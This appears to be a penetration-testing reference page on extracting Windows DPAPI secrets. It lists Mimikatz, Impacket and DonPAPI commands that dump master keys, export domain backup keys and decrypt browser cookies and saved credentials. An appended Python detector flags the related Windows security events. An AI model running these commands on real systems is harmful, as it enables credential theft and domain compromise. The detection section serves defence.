DPAPI secrets | The Hacker Recipes
On Windows systems, Mimikatz (C) can be used…
```bash
# Extract and decrypt a master key
dpapi::masterkey /in:"C:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Protect\\$SUID\\$GUID" /sid:$SID /password:$PASSWORD /protected

# Extract and decrypt all master keys
sekurlsa::dpapi

# Extract the backup keys & use them to decrypt a master key
lsadump::backupkeys /system:$DOMAIN_CONTROLLER /export
dpapi::masterkey /in:"C:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Protect\\$SUID\\$GUID" /pvk:$BACKUP_KEY_EXPORT_PVK

# Decrypt Chrome data
dpapi::chrome /in:"%localappdata%\\Google\\Chrome\\User Data\\Default\\Cookies"

# Decrypt DPAPI-protected data using a master key
dpapi::cred /in:"C:\\path\\to\\encrypted\\file" /masterkey:$MASTERKEY
```
From UNIX-like systems, DPAPI data can be manipulated (mainly offline) with tools like dpapick (Python), dpapilab (Python), and Impacket's dpapi.py and secretsdump.py (Python).

```bash
# (not tested) Decrypt a master key
dpapi.py masterkey -file "/path/to/masterkey_file" -sid $USER_SID -password $MASTERKEY_PASSWORD

# (not tested) Obtain the backup keys & use them to decrypt a master key
dpapi.py backupkeys -t $DOMAIN/$USER:$PASSWORD@$TARGET
dpapi.py masterkey -file "/path/to/masterkey_file" -pvk "/path/to/backup_key.pvk"

# (not tested) Decrypt DPAPI-protected data using a master key
dpapi.py credential -file "/path/to/protected_file" -key $MASTERKEY
```
DonPAPI (Python) can also be used to remotely extract a user's DPAPI secrets more easily. It supports pass-the-hash, pass-the-ticket and so on.

```bash
DonPAPI.py 'domain'/'username':'password'@<'targetName' or 'address/mask'>
```
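Added here as a defender-side example, not part of the original page: the master-key and backup-key operations listed above leave traces in the Windows Security log. Under the "Audit DPAPI Activity" subcategory, Windows records event 4692 (backup of a DPAPI master key attempted) and 4693 (recovery of a DPAPI master key attempted); on a domain controller with a SACL on the secret objects, a read of the domain backup key shows up as a 4662 whose object name contains BCKUPKEY. The log lines below are constructed, rendered as simplified key=value text (the field names are assumptions, not Microsoft's exact event schema), and the allow-list of principals permitted to read the backup key is a hypothetical site setting.

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, FrozenSet

# Constructed sample events in a simplified key=value rendering (not the real event schema).
SAMPLE_EVENTS = [
    'EventID=4624 Computer=WS01 SubjectUser=alice',
    'EventID=4692 Computer=WS01 SubjectUser=alice MasterKeyGUID={GUID-PLACEHOLDER} BackupServer=DC01 Status=0x0',
    'EventID=4693 Computer=WS01 SubjectUser=alice MasterKeyGUID={GUID-PLACEHOLDER} RecoveryServer=DC01 Status=0x0',
    'EventID=4662 Computer=DC01 SubjectUser=svc-backup ObjectType=SecretObject ObjectName="BCKUPKEY_PREFERRED Secret" AccessMask=0x2',
    'EventID=4662 Computer=DC01 SubjectUser=bob ObjectType=SecretObject ObjectName="BCKUPKEY_P Secret" AccessMask=0x2',
    'EventID=4662 Computer=DC01 SubjectUser=bob ObjectType=user ObjectName="CN=bob,OU=Staff,DC=example,DC=local" AccessMask=0x100',
]

# key=value pairs; a value may be a double-quoted string containing spaces.
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


@dataclass
class Alert:
    severity: str   # "review" for routine-but-interesting, "high" for likely abuse
    host: str
    user: str
    reason: str


def parse_event(line: str) -> Dict[str, str]:
    """Split one rendered event line into a field dictionary, dropping quotes."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def dpapi_alerts(lines: Iterable[str], allowed_backup_readers: FrozenSet[str] = frozenset()) -> List[Alert]:
    """Flag DPAPI master-key recoveries and reads of the domain backup key secret.

    4692 (backup) is routine on domain-joined hosts, so it is counted but not alerted.
    4693 (recovery) is worth review: it also happens after admin password resets.
    4662 on a BCKUPKEY secret by a principal outside the allow-list is high severity.
    """
    alerts: List[Alert] = []
    for line in lines:
        ev = parse_event(line)
        eid = ev.get("EventID")
        host, user = ev.get("Computer", "?"), ev.get("SubjectUser", "?")
        if eid == "4693":
            alerts.append(Alert("review", host, user,
                                "DPAPI master key recovered via " + ev.get("RecoveryServer", "?")))
        elif eid == "4662" and "BCKUPKEY" in ev.get("ObjectName", "").upper():
            if user not in allowed_backup_readers:
                alerts.append(Alert("high", host, user,
                                    "domain DPAPI backup key read: " + ev["ObjectName"]))
    return alerts
```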